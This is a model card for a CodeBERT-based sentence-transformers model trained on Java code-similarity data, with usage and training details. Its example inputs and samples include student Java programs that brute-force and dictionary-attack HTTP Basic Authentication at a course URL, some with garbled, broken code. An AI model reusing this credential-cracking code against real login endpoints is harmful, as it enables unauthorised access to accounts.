SentenceTransformer based on microsoft/codebert-base
This is a sentence-transformers model fine-tuned from microsoft/codebert-base. It maps sentences and paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
Model Details
Model Description
- Model Type: Sentence Transformer
- Base model: microsoft/codebert-base
- Maximum Sequence Length: 512 tokens
- Output Dimensionality: 768 dimensions
- Similarity Function: Cosine Similarity
Model Sources
- Documentation: Sentence Transformers Documentation
- Repository: Sentence Transformers on GitHub
- Hugging Face: Sentence Transformers on Hugging Face
Full Model Architecture
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: RobertaModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
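The Pooling module above has pooling_mode_mean_tokens set to True, so the sentence embedding is an average of the token embeddings. The following is a minimal pure-Python sketch of that idea, assuming padding positions are excluded through an attention mask. The function name, the toy 2-dimensional vectors, and the mask are illustrative and are not taken from the library.

```python
def mean_pool(token_embeddings, attention_mask):
    """Average the token vectors whose attention-mask entry is 1."""
    dim = len(token_embeddings[0])
    summed = [0.0] * dim
    count = 0
    for vector, keep in zip(token_embeddings, attention_mask):
        if keep:
            count += 1
            for i, value in enumerate(vector):
                summed[i] += value
    # Guard against an all-padding input to avoid dividing by zero.
    count = max(count, 1)
    return [value / count for value in summed]


# Toy 2-dimensional example (the real model uses 768 dimensions).
tokens = [[1.0, 2.0], [3.0, 4.0], [9.0, 9.0]]  # last row stands in for padding
mask = [1, 1, 0]
pooled = mean_pool(tokens, mask)
print(pooled)  # [2.0, 3.0]
```

The padded row is ignored, so the result is the average of the first two rows only.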
Usage
Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
pip install -U sentence-transformers
Then you can load this model and run inference.
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/SOCO-Java-CodeBERT-ST")
# Run inference
sentences = [
'\nimport java.net.*;\nimport java.io.*;\n\n\npublic class Dictionary\n{\n private String myUsername = "";\n private String myPassword = "";\n private String urlToCrack = "http://sec-crack.cs.rmit.edu./SEC/2";\n\n\n public static void main (String args[])\n {\n Dictionary d = new Dictionary();\n }\n\n public Dictionary()\n {\n generatePassword();\n }\n\n \n\n public void generatePassword()\n {\n try\n {\n BufferedReader = new BufferedReader(new FileReader("/usr/share/lib/dict/words"));\n\n \n {\n myPassword = bf.readLine();\n crackPassword(myPassword);\n } while (myPassword != null);\n }\n catch(IOException e)\n { }\n }\n\n\n \n\n public void crackPassword(String passwordToCrack)\n {\n String data, dataToEncode, encodedData;\n\n try\n {\n URL url = new URL (urlToCrack);\n\n \n\n dataToEncode = myUsername + ":" + passwordToCrack;\n\n \n\n encodedData = new bf.misc.BASE64Encoder().encode(dataToEncode.getBytes());\n\n URLConnection urlCon = url.openConnection();\n urlCon.setRequestProperty ("Authorization", " " + encodedData);\n\n InputStream is = (InputStream)urlCon.getInputStream();\n InputStreamReader isr = new InputStreamReader(is);\n BufferedReader bf = new BufferedReader (isr);\n\n \n {\n data = bf.readLine();\n System.out.println(data);\n displayPassword(passwordToCrack);\n } while (data != null);\n }\n catch (IOException e)\n { }\n }\n\n\n public void displayPassword(String foundPassword)\n {\n System.out.println("\\nThe cracked password is : " + foundPassword);\n System.exit(0);\n }\n}\n\n\n',
'\nimport java.io.*;\n\npublic class PasswordFile {\n \n private String strFilepath;\n private String strCurrWord;\n private File fWordFile;\n private BufferedReader in;\n \n \n public PasswordFile(String filepath) {\n strFilepath = filepath;\n try {\n fWordFile = new File(strFilepath);\n in = new BufferedReader(new FileReader(fWordFile));\n }\n catch(Exception e)\n {\n System.out.println("Could not open file " + strFilepath);\n }\n }\n \n String getPassword() {\n return strCurrWord;\n }\n \n String getNextPassword() {\n try {\n strCurrWord = in.readLine();\n \n \n \n }\n catch (Exception e)\n {\n \n return null;\n }\n \n return strCurrWord;\n }\n \n}\n',
'\n\n\nimport java.misc.BASE64Encoder;\nimport java.misc.BASE64Decoder;\n\nimport java.io.*;\nimport java.net.*;\nimport java.util.*;\n\n\npublic class BruteForce {\n \n static char [] passwordDataSet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz".toCharArray();\n \n private int indices[] = {0,0,0};\n \n private String url = null;\n\n \n public BruteForce(String url) {\n this.url = url;\n\n }\n \n private int attempts = 0;\n private boolean stopGen = false;\n \n public String getNextPassword(){\n String nextPassword = "";\n for(int i = 0; i <indices.length ; i++){\n if(indices[indices.length -1 ] == passwordDataSet.length)\n return null;\n if(indices[i] == passwordDataSet.length ){\n indices[i] = 0;\n indices[i+1]++;\n }\n nextPassword = passwordDataSet[indices[i]]+nextPassword;\n\n if(i == 0)\n indices[0]++;\n\n }\n return nextPassword;\n }\n \n public void setIndices(int size){\n this.indices = new int[size];\n for(int i = 0; i < size; i++)\n this.indices[i] = 0;\n }\n public void setPasswordDataSet(String newDataSet){\n this.passwordDataSet = newDataSet.toCharArray();\n }\n \n public String crackPassword(String user) throws IOException, MalformedURLException{\n URL url = null;\n URLConnection urlConnection = null;\n String outcome = null;\n String authorization = null;\n String password = null;\n BASE64Encoder b64enc = new BASE64Encoder();\n InputStream content = null;\n BufferedReader in = null;\n String line;\n int i = 0;\n while(!"HTTP/1.1 200 OK".equalsIgnoreCase(outcome)){\n url = new URL(this.url);\n urlConnection = url.openConnection();\n urlConnection.setDoInput(true);\n urlConnection.setDoOutput(true);\n\n\n urlConnection.setRequestProperty("GET", url.getPath() + " HTTP/1.1");\n urlConnection.setRequestProperty("Host", url.getHost());\n password = getNextPassword();\n if(password == null)\n return null;\n System.out.print(password);\n authorization = user + ":" + password;\n\n\n urlConnection.setRequestProperty("Authorization", " "+ 
b64enc.encode(authorization.getBytes()));\n\n\noutcome = urlConnection.getHeaderField(null); \n\n\n\n this.attempts ++;\n urlConnection = null;\n url = null;\n\n if(this.attempts%51 == 0)\n for(int b = 0; b < 53;b++)\n System.out.print("\\b \\b");\n else\n System.out.print("\\b\\b\\b.");\n\n }\n return password;\n }\n \n public int getAttempts(){\n return this.attempts;\n }\n public static void main (String[] args) {\n if(args.length != 2){\n System.out.println("usage: java attacks.BruteForce <url crack: e.g. http://sec-crack.cs.rmit.edu./SEC/2/> <username: e.g. >");\n System.exit(1);\n }\n\n BruteForce bruteForce1 = new BruteForce(args[0]);\n try{\n Calendar cal1=null, cal2=null;\n cal1 = Calendar.getInstance();\n System.out.println("Cracking started at: " + cal1.getTime().toString());\n String password = bruteForce1.crackPassword(args[1]);\n if(password != null)\n System.out.println("\\nPassword is: "+password);\n else\n System.out.println("\\nPassword could not retrieved!");\n cal2 = Calendar.getInstance();\n System.out.println("Cracking finished at: " + cal2.getTime().toString());\n Date d3 = new Date(cal2.getTime().getTime() - cal1.getTime().getTime());\n System.out.println("Total Time taken crack: " + (d3.getTime())/1000 + " sec");\n System.out.println("Total attempts : " + bruteForce1.getAttempts());\n\n }catch(MalformedURLException mue){\n mue.printStackTrace();\n }\n\n catch(IOException ioe){\n ioe.printStackTrace();\n }\n }\n}',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]
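The card lists cosine similarity as the model's similarity function. As a rough illustration of what a pairwise score means, the sketch below computes cosine similarity in pure Python and ranks every pair of inputs from most to least similar. The helper names and the toy 2-dimensional vectors are hypothetical; with real embeddings one might pass something like `model.encode(sentences).tolist()` instead.

```python
import math


def cosine_similarity(a, b):
    """Cosine of the angle between two vectors; 0.0 if either has zero length."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    if norm_a == 0.0 or norm_b == 0.0:
        return 0.0
    return dot / (norm_a * norm_b)


def rank_pairs(embeddings):
    """Return (score, i, j) for every pair i < j, most similar first."""
    pairs = []
    for i in range(len(embeddings)):
        for j in range(i + 1, len(embeddings)):
            score = cosine_similarity(embeddings[i], embeddings[j])
            pairs.append((score, i, j))
    return sorted(pairs, reverse=True)


# Toy vectors: the first two point in the same direction, the third is orthogonal.
toy_embeddings = [[1.0, 0.0], [2.0, 0.0], [0.0, 3.0]]
ranked = rank_pairs(toy_embeddings)
print(ranked[0][1:])  # (0, 1)
```

Because cosine similarity ignores vector length, the first two toy vectors score 1.0 even though their magnitudes differ.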
Training Details
Training Dataset
Unnamed Dataset
- Size: 33,411 training samples
- Columns: sentence_0, sentence_1, and label
- Approximate statistics based on the first 1000 samples:

| | sentence_0 | sentence_1 | label |
|---|---|---|---|
| type | string | string | int |
| details | min: 61 tokens; mean: 471.36 tokens; max: 512 tokens | min: 61 tokens; mean: 491.01 tokens; max: 512 tokens | 0: ~99.50%; 1: ~0.50% |
- Samples:

Sample 1, sentence_0:
public class ImageFile
{
private String imageUrl;
private int imageSize;
public ImageFile(String url, int size)
{
imageUrl=url;
imageSize=size;
}
public String getImageUrl()
{
return imageUrl;
}
public int getImageSize()
{
return imageSize;
}
}

Sample 1, sentence_1:
import java.net.*;
import java.io.*;
import java.util.Date;
public class MyMail implements Serializable
{
public static final int SMTPPort = 25;
public static final char successPrefix = '2';
public static final char morePrefix = '3';
public static final char failurePrefix = '4';
private static final String CRLF = "\r\n";
private String mailFrom = "";
private String mailTo = "";
private String messageSubject = "";
private String messageBody = "";
private String mailServer = "";
public MyMail ()
{
super();
}
public MyMail ( String serverName)
{
super();
mailServer = serverName;
}
public String getFrom()
{
return mailFrom;
}
public String getTo()
{
return mailTo;
}
public String getSubject()
{
return messageSubject;
}
public String getMessage()
{
return messageBody;
}
public String getMailServer()
{
return mailServer;
}
public void setFrom( String from )
{
mailFr...

Sample 1, label: 0

Sample 2, sentence_0:
import java.util.*;
import java.net.*;
import java.io.*;
public class WatchDog
{
private Vector init;
public WatchDog()
{
try
{
Runtime run = Runtime.getRuntime();
String command_line = "lynx http://www.cs.rmit.edu./students/ -dump";
Process result = run.exec(command_line);
BufferedReader in = new BufferedReader(new InputStreamReader(result.getInputStream()));
String inputLine;
init = new Vector();
while ((inputLine = in.readLine()) != null)
{
init.addElement(inputLine);
}
}catch(Exception e)
{
}
}
public static void main(String args[])
{
WatchDog wd = new WatchDog();
wd.nextRead();
}
public void nextRead()
{
while(true)
{
ScheduleTask sch = new ScheduleTask(init);
if(sch.getFlag()!=0)
{
System.out.println("change happen");
WatchDog wd = new WatchDog();
wd.nextRead();
}
}
}
}

Sample 2, sentence_1:
import java.net.*;
import java.io.*;
import java.util.*;
public class Dictionary{
private static URL location;
private static String user;
private BufferedReader input;
private static BufferedReader dictionary;
private int maxLetters = 3;
public Dictionary() {
Authenticator.setDefault(new MyAuthenticator ());
startTime = System.currentTimeMillis();
boolean passwordMatched = false;
while (!passwordMatched) {
try {
input = new BufferedReader(new InputStreamReader(location.openStream()));
String line = input.readLine();
while (line != null) {
System.out.println(line);
line = input.readLine();
}
input.close();
passwordMatched = true;
}
catch (ProtocolException e)
{
}
catch (ConnectException e) {
System.out.println("Failed connect");
}
catch (IOException e) ...

Sample 2, label: 0

Sample 3, sentence_0:
import java.util.*;
import java.net.*;
import java.io.*;
public class ScheduleTask extends Thread
{
private int flag=0,count1=0,count2=0;
private Vector change;
public ScheduleTask(Vector init)
{
try
{
Runtime run = Runtime.getRuntime();
String command_line = "lynx http://yallara.cs.rmit.edu./~/index.html -dump";
Process result = run.exec(command_line);
BufferedReader in = new BufferedReader(new InputStreamReader(result.getInputStream()));
String inputLine;
Vector newVector = new Vector();
change = new Vector();
while ((inputLine = in.readLine()) != null)
{
newVector.addElement(inputLine);
}
if(init.size()>newVector.size())
{
for(int k=0;k {
if(!newVector.elementAt(k).toString().equals(init.elementAt(k).toString()))
ch...

Sample 3, sentence_1:
import java.io.*;
import java.net.*;
import java.util.*;
public class Dictionary
{
public static void main (String args[])
{
Calendar cal = Calendar.getInstance();
Date now=cal.getTime();
double startTime = now.getTime();
String password=getPassword(startTime);
System.out.println("The password is " + password);
}
public static String getPassword(double startTime)
{
String password="";
int requests=0;
try
{
FileReader fRead = new FileReader("/usr/share/lib/dict/words");
BufferedReader buf = new BufferedReader(fRead);
password=buf.readLine();
while (password != null)
{
if (password.length()<=3)
{
requests++;
if (testPassword(password, startTime, requests))
return password;
}
password = buf.readLine();
}
}
catch (IOException ioe)
{
}
return password;
}
private static boolean testPassword(String password, double startTime, int requests)
{
try
{
U...

Sample 3, label: 0

- Loss: BatchAllTripletLoss
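To make the loss named above more concrete, here is a small pure-Python sketch of the batch-all triplet idea from the Hermans et al. paper cited below: form every valid (anchor, positive, negative) triplet in a batch from the labels, apply a hinge with a margin, and average over the triplets that still violate the margin. This is an illustration only and not the library's implementation. The Euclidean distance, the margin value, and all names are assumptions; the card does not state which distance or margin was used.

```python
import math


def euclidean(a, b):
    """Euclidean distance between two equal-length vectors."""
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))


def batch_all_triplet_loss(embeddings, labels, margin):
    """Average hinge loss over all valid triplets that violate the margin."""
    total = 0.0
    active = 0
    n = len(embeddings)
    for a in range(n):
        for p in range(n):
            # A positive shares the anchor's label but is a different sample.
            if p == a or labels[p] != labels[a]:
                continue
            for neg in range(n):
                # A negative has a different label from the anchor.
                if labels[neg] == labels[a]:
                    continue
                loss = (
                    euclidean(embeddings[a], embeddings[p])
                    - euclidean(embeddings[a], embeddings[neg])
                    + margin
                )
                if loss > 0.0:
                    total += loss
                    active += 1
    return total / active if active else 0.0


# Toy 1-dimensional batch: two samples with label 1, one with label 0.
toy_embeddings = [[0.0], [1.0], [3.0]]
toy_labels = [1, 1, 0]
print(batch_all_triplet_loss(toy_embeddings, toy_labels, margin=2.0))  # 1.0
```

In this sketch, a batch in which every label is identical yields no valid triplet and therefore a loss of 0.0.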
Training Hyperparameters
Non-Default Hyperparameters
- per_device_train_batch_size: 16
- per_device_eval_batch_size: 16
- num_train_epochs: 1
- multi_dataset_batch_sampler: round_robin
All Hyperparameters
- overwrite_output_dir: False
- do_predict: False
- eval_strategy: no
- prediction_loss_only: True
- per_device_train_batch_size: 16
- per_device_eval_batch_size: 16
- per_gpu_train_batch_size: None
- per_gpu_eval_batch_size: None
- gradient_accumulation_steps: 1
- eval_accumulation_steps: None
- torch_empty_cache_steps: None
- learning_rate: 5e-05
- weight_decay: 0.0
- adam_beta1: 0.9
- adam_beta2: 0.999
- adam_epsilon: 1e-08
- max_grad_norm: 1
- num_train_epochs: 1
- max_steps: -1
- lr_scheduler_type: linear
- lr_scheduler_kwargs: {}
- warmup_ratio: 0.0
- warmup_steps: 0
- log_level: passive
- log_level_replica: warning
- log_on_each_node: True
- logging_nan_inf_filter: True
- save_safetensors: True
- save_on_each_node: False
- save_only_model: False
- restore_callback_states_from_checkpoint: False
- no_cuda: False
- use_cpu: False
- use_mps_device: False
- seed: 42
- data_seed: None
- jit_mode_eval: False
- use_ipex: False
- bf16: False
- fp16: False
- fp16_opt_level: O1
- half_precision_backend: auto
- bf16_full_eval: False
- fp16_full_eval: False
- tf32: None
- local_rank: 0
- ddp_backend: None
- tpu_num_cores: None
- tpu_metrics_debug: False
- debug: []
- dataloader_drop_last: False
- dataloader_num_workers: 0
- dataloader_prefetch_factor: None
- past_index: -1
- disable_tqdm: False
- remove_unused_columns: True
- label_names: None
- load_best_model_at_end: False
- ignore_data_skip: False
- fsdp: []
- fsdp_min_num_params: 0
- fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- fsdp_transformer_layer_cls_to_wrap: None
- accelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- deepspeed: None
- label_smoothing_factor: 0.0
- optim: adamw_torch
- optim_args: None
- adafactor: False
- group_by_length: False
- length_column_name: length
- ddp_find_unused_parameters: None
- ddp_bucket_cap_mb: None
- ddp_broadcast_buffers: False
- dataloader_pin_memory: True
- dataloader_persistent_workers: False
- skip_memory_metrics: True
- use_legacy_prediction_loop: False
- push_to_hub: False
- resume_from_checkpoint: None
- hub_model_id: None
- hub_strategy: every_save
- hub_private_repo: None
- hub_always_push: False
- gradient_checkpointing: False
- gradient_checkpointing_kwargs: None
- include_inputs_for_metrics: False
- include_for_metrics: []
- eval_do_concat_batches: True
- fp16_backend: auto
- push_to_hub_model_id: None
- push_to_hub_organization: None
- mp_parameters:
- auto_find_batch_size: False
- full_determinism: False
- torchdynamo: None
- ray_scope: last
- ddp_timeout: 1800
- torch_compile: False
- torch_compile_backend: None
- torch_compile_mode: None
- include_tokens_per_second: False
- include_num_input_tokens_seen: False
- neftune_noise_alpha: None
- optim_target_modules: None
- batch_eval_metrics: False
- eval_on_start: False
- use_liger_kernel: False
- eval_use_gather_object: False
- average_tokens_across_devices: False
- prompts: None
- batch_sampler: batch_sampler
- multi_dataset_batch_sampler: round_robin
Training Logs
| Epoch | Step | Training Loss |
|---|---|---|
| 0.2393 | 500 | 0.1875 |
| 0.4787 | 1000 | 0.1815 |
| 0.7180 | 1500 | 0.24 |
| 0.9574 | 2000 | 0.1596 |
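The Epoch column in the table above can be reproduced from figures already in this card. The short calculation below assumes training ran on a single device (the card does not say), and uses the stated 33,411 training samples, a per-device batch size of 16, gradient_accumulation_steps of 1, and dataloader_drop_last set to False, so the final partial batch counts as a step.

```python
import math

training_samples = 33_411  # from the Training Dataset section
batch_size = 16            # per_device_train_batch_size
num_devices = 1            # assumption: not stated in the card

# With drop_last disabled, the last partial batch still counts as one step.
steps_per_epoch = math.ceil(training_samples / (batch_size * num_devices))
print(steps_per_epoch)  # 2089

logged_steps = (500, 1000, 1500, 2000)
epochs = [f"{step / steps_per_epoch:.4f}" for step in logged_steps]
print(epochs)  # ['0.2393', '0.4787', '0.7180', '0.9574']
```

Under that single-device assumption, the computed fractions match the logged Epoch values, which also implies roughly 2,089 optimizer steps for the one training epoch.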
Framework Versions
- Python: 3.11.13
- Sentence Transformers: 4.1.0
- Transformers: 4.52.4
- PyTorch: 2.6.0+cu124
- Accelerate: 1.7.0
- Datasets: 3.6.0
- Tokenizers: 0.21.1
Citation
BibTeX
Sentence Transformers
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
BatchAllTripletLoss
@misc{hermans2017defense,
title={In Defense of the Triplet Loss for Person Re-Identification},
author={Alexander Hermans and Lucas Beyer and Bastian Leibe},
year={2017},
eprint={1703.07737},
archivePrefix={arXiv},
primaryClass={cs.CV}
}